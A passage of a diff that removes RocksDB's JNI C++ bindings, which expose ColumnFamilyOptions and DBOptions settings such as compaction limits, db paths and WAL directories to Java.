-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jsoft_pending_compaction_bytes_limit) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->soft_pending_compaction_bytes_limit =
-          static_cast<int64_t>(jsoft_pending_compaction_bytes_limit);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    softHardCompactionBytesLimit
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_ColumnFamilyOptions_hardPendingCompactionBytesLimit(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->hard_pending_compaction_bytes_limit;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setHardPendingCompactionBytesLimit
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setHardPendingCompactionBytesLimit(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jhard_pending_compaction_bytes_limit) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->hard_pending_compaction_bytes_limit =
-          static_cast<int64_t>(jhard_pending_compaction_bytes_limit);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    level0FileNumCompactionTrigger
- * Signature: (J)I
- */
-jint Java_org_rocksdb_ColumnFamilyOptions_level0FileNumCompactionTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-    jhandle)->level0_file_num_compaction_trigger;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setLevel0FileNumCompactionTrigger
- * Signature: (JI)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setLevel0FileNumCompactionTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jlevel0_file_num_compaction_trigger) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->level0_file_num_compaction_trigger =
-          static_cast<int32_t>(jlevel0_file_num_compaction_trigger);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    level0SlowdownWritesTrigger
- * Signature: (J)I
- */
-jint Java_org_rocksdb_ColumnFamilyOptions_level0SlowdownWritesTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-    jhandle)->level0_slowdown_writes_trigger;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setLevel0SlowdownWritesTrigger
- * Signature: (JI)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setLevel0SlowdownWritesTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jlevel0_slowdown_writes_trigger) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->level0_slowdown_writes_trigger =
-          static_cast<int32_t>(jlevel0_slowdown_writes_trigger);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    level0StopWritesTrigger
- * Signature: (J)I
- */
-jint Java_org_rocksdb_ColumnFamilyOptions_level0StopWritesTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-    jhandle)->level0_stop_writes_trigger;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setLevel0StopWritesTrigger
- * Signature: (JI)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setLevel0StopWritesTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jlevel0_stop_writes_trigger) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->level0_stop_writes_trigger =
-          static_cast<int32_t>(jlevel0_stop_writes_trigger);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    maxBytesForLevelMultiplierAdditional
- * Signature: (J)[I
- */
-jintArray Java_org_rocksdb_ColumnFamilyOptions_maxBytesForLevelMultiplierAdditional(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto mbflma = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->max_bytes_for_level_multiplier_additional;
-
-  const size_t size = mbflma.size();
-
-  jint* additionals = new jint[size];
-  for (size_t i = 0; i < size; i++) {
-    additionals[i] = static_cast<jint>(mbflma[i]);
-  }
-
-  jsize jlen = static_cast<jsize>(size);
-  jintArray result = env->NewIntArray(jlen);
-  if(result == nullptr) {
-    // exception thrown: OutOfMemoryError
-    delete [] additionals;
-    return nullptr;
-  }
-  env->SetIntArrayRegion(result, 0, jlen, additionals);
-  if(env->ExceptionCheck()) {
-      // exception thrown: ArrayIndexOutOfBoundsException
-      env->DeleteLocalRef(result);
-      delete [] additionals;
-      return nullptr;
-  }
-
-  delete [] additionals;
-
-  return result;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setMaxBytesForLevelMultiplierAdditional
- * Signature: (J[I)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setMaxBytesForLevelMultiplierAdditional(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jintArray jmax_bytes_for_level_multiplier_additional) {
-  jsize len = env->GetArrayLength(jmax_bytes_for_level_multiplier_additional);
-  jint *additionals =
-      env->GetIntArrayElements(jmax_bytes_for_level_multiplier_additional, 0);
-  if(additionals == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  auto* cf_opt = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  cf_opt->max_bytes_for_level_multiplier_additional.clear();
-  for (jsize i = 0; i < len; i++) {
-    cf_opt->max_bytes_for_level_multiplier_additional.push_back(static_cast<int32_t>(additionals[i]));
-  }
-
-  env->ReleaseIntArrayElements(jmax_bytes_for_level_multiplier_additional,
-      additionals, JNI_ABORT);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    paranoidFileChecks
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_ColumnFamilyOptions_paranoidFileChecks(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->paranoid_file_checks;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setParanoidFileChecks
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setParanoidFileChecks(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jparanoid_file_checks) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->paranoid_file_checks =
-          static_cast<bool>(jparanoid_file_checks);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setCompactionPriority
- * Signature: (JB)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setCompactionPriority(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jbyte jcompaction_priority_value) {
-  auto* cf_opts = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  cf_opts->compaction_pri =
-      rocksdb::CompactionPriorityJni::toCppCompactionPriority(jcompaction_priority_value);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    compactionPriority
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_ColumnFamilyOptions_compactionPriority(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* cf_opts = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  return rocksdb::CompactionPriorityJni::toJavaCompactionPriority(
-      cf_opts->compaction_pri);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setReportBgIoStats
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setReportBgIoStats(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jreport_bg_io_stats) {
-  auto* cf_opts = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  cf_opts->report_bg_io_stats = static_cast<bool>(jreport_bg_io_stats);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    reportBgIoStats
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_ColumnFamilyOptions_reportBgIoStats(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* cf_opts = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  return static_cast<bool>(cf_opts->report_bg_io_stats);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setCompactionOptionsUniversal
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setCompactionOptionsUniversal(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jcompaction_options_universal_handle) {
-  auto* cf_opts = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  auto* opts_uni =
-      reinterpret_cast<rocksdb::CompactionOptionsUniversal*>(
-          jcompaction_options_universal_handle);
-  cf_opts->compaction_options_universal = *opts_uni;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setCompactionOptionsFIFO
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setCompactionOptionsFIFO(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jcompaction_options_fifo_handle) {
-  auto* cf_opts = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  auto* opts_fifo =
-      reinterpret_cast<rocksdb::CompactionOptionsFIFO*>(
-          jcompaction_options_fifo_handle);
-  cf_opts->compaction_options_fifo = *opts_fifo;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setForceConsistencyChecks
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setForceConsistencyChecks(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jforce_consistency_checks) {
-  auto* cf_opts = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  cf_opts->force_consistency_checks = static_cast<bool>(jforce_consistency_checks);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    forceConsistencyChecks
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_ColumnFamilyOptions_forceConsistencyChecks(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* cf_opts = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  return static_cast<bool>(cf_opts->force_consistency_checks);
-}
-
-/////////////////////////////////////////////////////////////////////
-// rocksdb::DBOptions
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    newDBOptions
- * Signature: ()J
- */
-jlong Java_org_rocksdb_DBOptions_newDBOptions(JNIEnv* env,
-    jclass jcls) {
-  auto* dbop = new rocksdb::DBOptions();
-  return reinterpret_cast<jlong>(dbop);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    getDBOptionsFromProps
- * Signature: (Ljava/util/String;)J
- */
-jlong Java_org_rocksdb_DBOptions_getDBOptionsFromProps(
-    JNIEnv* env, jclass jclazz, jstring jopt_string) {
-  const char* opt_string = env->GetStringUTFChars(jopt_string, nullptr);
-  if(opt_string == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return 0;
-  }
-
-  auto* db_options = new rocksdb::DBOptions();
-  rocksdb::Status status = rocksdb::GetDBOptionsFromString(
-      rocksdb::DBOptions(), opt_string, db_options);
-
-  env->ReleaseStringUTFChars(jopt_string, opt_string);
-
-  // Check if DBOptions creation was possible.
-  jlong ret_value = 0;
-  if (status.ok()) {
-    ret_value = reinterpret_cast<jlong>(db_options);
-  } else {
-    // if operation failed the DBOptions need to be deleted
-    // again to prevent a memory leak.
-    delete db_options;
-  }
-  return ret_value;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_DBOptions_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  auto* dbo = reinterpret_cast<rocksdb::DBOptions*>(handle);
-  assert(dbo != nullptr);
-  delete dbo;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    optimizeForSmallDb
- * Signature: (J)V
- */
-void Java_org_rocksdb_DBOptions_optimizeForSmallDb(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->OptimizeForSmallDb();
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setEnv
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setEnv(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jenv_handle) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->env =
-      reinterpret_cast<rocksdb::Env*>(jenv_handle);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setIncreaseParallelism
- * Signature: (JI)V
- */
-void Java_org_rocksdb_DBOptions_setIncreaseParallelism(
-    JNIEnv * env, jobject jobj, jlong jhandle, jint totalThreads) {
-  reinterpret_cast<rocksdb::DBOptions*>
-      (jhandle)->IncreaseParallelism(static_cast<int>(totalThreads));
-}
-
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setCreateIfMissing
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setCreateIfMissing(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean flag) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->
-      create_if_missing = flag;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    createIfMissing
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_createIfMissing(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->create_if_missing;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setCreateMissingColumnFamilies
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setCreateMissingColumnFamilies(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean flag) {
-  reinterpret_cast<rocksdb::DBOptions*>
-      (jhandle)->create_missing_column_families = flag;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    createMissingColumnFamilies
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_createMissingColumnFamilies(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>
-      (jhandle)->create_missing_column_families;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setErrorIfExists
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setErrorIfExists(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean error_if_exists) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->error_if_exists =
-      static_cast<bool>(error_if_exists);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    errorIfExists
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_errorIfExists(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->error_if_exists;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setParanoidChecks
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setParanoidChecks(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean paranoid_checks) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->paranoid_checks =
-      static_cast<bool>(paranoid_checks);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    paranoidChecks
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_paranoidChecks(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->paranoid_checks;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setRateLimiter
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setRateLimiter(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jrate_limiter_handle) {
-  std::shared_ptr<rocksdb::RateLimiter> *pRateLimiter =
-      reinterpret_cast<std::shared_ptr<rocksdb::RateLimiter> *>(
-          jrate_limiter_handle);
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->rate_limiter = *pRateLimiter;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setLogger
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setLogger(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jlogger_handle) {
-  std::shared_ptr<rocksdb::LoggerJniCallback> *pLogger =
-      reinterpret_cast<std::shared_ptr<rocksdb::LoggerJniCallback> *>(
-          jlogger_handle);
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->info_log = *pLogger;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setInfoLogLevel
- * Signature: (JB)V
- */
-void Java_org_rocksdb_DBOptions_setInfoLogLevel(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jlog_level) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->info_log_level =
-    static_cast<rocksdb::InfoLogLevel>(jlog_level);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    infoLogLevel
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_DBOptions_infoLogLevel(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return static_cast<jbyte>(
-      reinterpret_cast<rocksdb::DBOptions*>(jhandle)->info_log_level);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setMaxTotalWalSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setMaxTotalWalSize(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jmax_total_wal_size) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->max_total_wal_size =
-      static_cast<jlong>(jmax_total_wal_size);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    maxTotalWalSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_maxTotalWalSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->
-      max_total_wal_size;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setMaxOpenFiles
- * Signature: (JI)V
- */
-void Java_org_rocksdb_DBOptions_setMaxOpenFiles(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint max_open_files) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->max_open_files =
-      static_cast<int>(max_open_files);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    maxOpenFiles
- * Signature: (J)I
- */
-jint Java_org_rocksdb_DBOptions_maxOpenFiles(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->max_open_files;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setMaxFileOpeningThreads
- * Signature: (JI)V
- */
-void Java_org_rocksdb_DBOptions_setMaxFileOpeningThreads(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jmax_file_opening_threads) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->max_file_opening_threads =
-      static_cast<int>(jmax_file_opening_threads);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    maxFileOpeningThreads
- * Signature: (J)I
- */
-jint Java_org_rocksdb_DBOptions_maxFileOpeningThreads(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return static_cast<int>(opt->max_file_opening_threads);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setStatistics
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setStatistics(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jstatistics_handle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  auto* pSptr =
-      reinterpret_cast<std::shared_ptr<rocksdb::StatisticsJni>*>(
-          jstatistics_handle);
-  opt->statistics = *pSptr;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    statistics
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_statistics(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  std::shared_ptr<rocksdb::Statistics> sptr = opt->statistics;
-  if (sptr == nullptr) {
-    return 0;
-  } else {
-    std::shared_ptr<rocksdb::Statistics>* pSptr =
-        new std::shared_ptr<rocksdb::Statistics>(sptr);
-    return reinterpret_cast<jlong>(pSptr);
-  }
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setUseFsync
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setUseFsync(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean use_fsync) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->use_fsync =
-      static_cast<bool>(use_fsync);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    useFsync
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_useFsync(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->use_fsync;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setDbPaths
- * Signature: (J[Ljava/lang/String;[J)V
- */
-void Java_org_rocksdb_DBOptions_setDbPaths(
-    JNIEnv* env, jobject jobj, jlong jhandle, jobjectArray jpaths,
-    jlongArray jtarget_sizes) {
-  std::vector<rocksdb::DbPath> db_paths;
-  jlong* ptr_jtarget_size = env->GetLongArrayElements(jtarget_sizes, nullptr);
-  if(ptr_jtarget_size == nullptr) {
-      // exception thrown: OutOfMemoryError
-      return;
-  }
-
-  jboolean has_exception = JNI_FALSE;
-  const jsize len = env->GetArrayLength(jpaths);
-  for(jsize i = 0; i < len; i++) {
-    jobject jpath = reinterpret_cast<jstring>(env->
-        GetObjectArrayElement(jpaths, i));
-    if(env->ExceptionCheck()) {
-      // exception thrown: ArrayIndexOutOfBoundsException
-      env->ReleaseLongArrayElements(
-          jtarget_sizes, ptr_jtarget_size, JNI_ABORT);
-      return;
-    }
-    std::string path = rocksdb::JniUtil::copyString(
-        env, static_cast<jstring>(jpath), &has_exception);
-    env->DeleteLocalRef(jpath);
-
-    if(has_exception == JNI_TRUE) {
-        env->ReleaseLongArrayElements(
-            jtarget_sizes, ptr_jtarget_size, JNI_ABORT);
-        return;
-    }
-
-    jlong jtarget_size = ptr_jtarget_size[i];
-
-    db_paths.push_back(
-        rocksdb::DbPath(path, static_cast<uint64_t>(jtarget_size)));
-  }
-
-  env->ReleaseLongArrayElements(jtarget_sizes, ptr_jtarget_size, JNI_ABORT);
-
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  opt->db_paths = db_paths;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    dbPathsLen
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_dbPathsLen(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return static_cast<jlong>(opt->db_paths.size());
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    dbPaths
- * Signature: (J[Ljava/lang/String;[J)V
- */
-void Java_org_rocksdb_DBOptions_dbPaths(
-    JNIEnv* env, jobject jobj, jlong jhandle, jobjectArray jpaths,
-    jlongArray jtarget_sizes) {
-  jlong* ptr_jtarget_size = env->GetLongArrayElements(jtarget_sizes, nullptr);
-  if(ptr_jtarget_size == nullptr) {
-      // exception thrown: OutOfMemoryError
-      return;
-  }
-
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  const jsize len = env->GetArrayLength(jpaths);
-  for(jsize i = 0; i < len; i++) {
-    rocksdb::DbPath db_path = opt->db_paths[i];
-
-    jstring jpath = env->NewStringUTF(db_path.path.c_str());
-    if(jpath == nullptr) {
-      // exception thrown: OutOfMemoryError
-      env->ReleaseLongArrayElements(
-          jtarget_sizes, ptr_jtarget_size, JNI_ABORT);
-      return;
-    }
-    env->SetObjectArrayElement(jpaths, i, jpath);
-    if(env->ExceptionCheck()) {
-      // exception thrown: ArrayIndexOutOfBoundsException
-      env->DeleteLocalRef(jpath);
-      env->ReleaseLongArrayElements(
-          jtarget_sizes, ptr_jtarget_size, JNI_ABORT);
-      return;
-    }
-
-    ptr_jtarget_size[i] = static_cast<jint>(db_path.target_size);
-  }
-
-  env->ReleaseLongArrayElements(jtarget_sizes, ptr_jtarget_size, JNI_COMMIT);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setDbLogDir
- * Signature: (JLjava/lang/String)V
- */
-void Java_org_rocksdb_DBOptions_setDbLogDir(
-    JNIEnv* env, jobject jobj, jlong jhandle, jstring jdb_log_dir) {
-  const char* log_dir = env->GetStringUTFChars(jdb_log_dir, nullptr);
-  if(log_dir == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->db_log_dir.assign(log_dir);
-  env->ReleaseStringUTFChars(jdb_log_dir, log_dir);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    dbLogDir
- * Signature: (J)Ljava/lang/String
- */
-jstring Java_org_rocksdb_DBOptions_dbLogDir(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return env->NewStringUTF(
-      reinterpret_cast<rocksdb::DBOptions*>(jhandle)->db_log_dir.c_str());
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setWalDir
- * Signature: (JLjava/lang/String)V
- */
-void Java_org_rocksdb_DBOptions_setWalDir(
-    JNIEnv* env, jobject jobj, jlong jhandle, jstring jwal_dir) {
-  const char* wal_dir = env->GetStringUTFChars(jwal_dir, 0);
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->wal_dir.assign(wal_dir);
-  env->ReleaseStringUTFChars(jwal_dir, wal_dir);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    walDir
- * Signature: (J)Ljava/lang/String
- */
-jstring Java_org_rocksdb_DBOptions_walDir(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return env->NewStringUTF(
-      reinterpret_cast<rocksdb::DBOptions*>(jhandle)->wal_dir.c_str());
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setDeleteObsoleteFilesPeriodMicros
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setDeleteObsoleteFilesPeriodMicros(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong micros) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)
-      ->delete_obsolete_files_period_micros =
-          static_cast<int64_t>(micros);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    deleteObsoleteFilesPeriodMicros
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_deleteObsoleteFilesPeriodMicros(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)
-      ->delete_obsolete_files_period_micros;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setBaseBackgroundCompactions
- * Signature: (JI)V
- */
-void Java_org_rocksdb_DBOptions_setBaseBackgroundCompactions(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint max) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)
-      ->base_background_compactions = static_cast<int>(max);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    baseBackgroundCompactions
- * Signature: (J)I
- */
-jint Java_org_rocksdb_DBOptions_baseBackgroundCompactions(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)
-      ->base_background_compactions;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setMaxBackgroundCompactions
- * Signature: (JI)V
- */
-void Java_org_rocksdb_DBOptions_setMaxBackgroundCompactions(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint max) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)
-      ->max_background_compactions = static_cast<int>(max);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    maxBackgroundCompactions
- * Signature: (J)I
- */
-jint Java_org_rocksdb_DBOptions_maxBackgroundCompactions(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(
-      jhandle)->max_background_compactions;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setMaxSubcompactions
- * Signature: (JI)V
- */
-void Java_org_rocksdb_DBOptions_setMaxSubcompactions(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint max) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)
-      ->max_subcompactions = static_cast<int32_t>(max);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    maxSubcompactions
- * Signature: (J)I
- */
-jint Java_org_rocksdb_DBOptions_maxSubcompactions(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)
-      ->max_subcompactions;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setMaxBackgroundFlushes
- * Signature: (JI)V
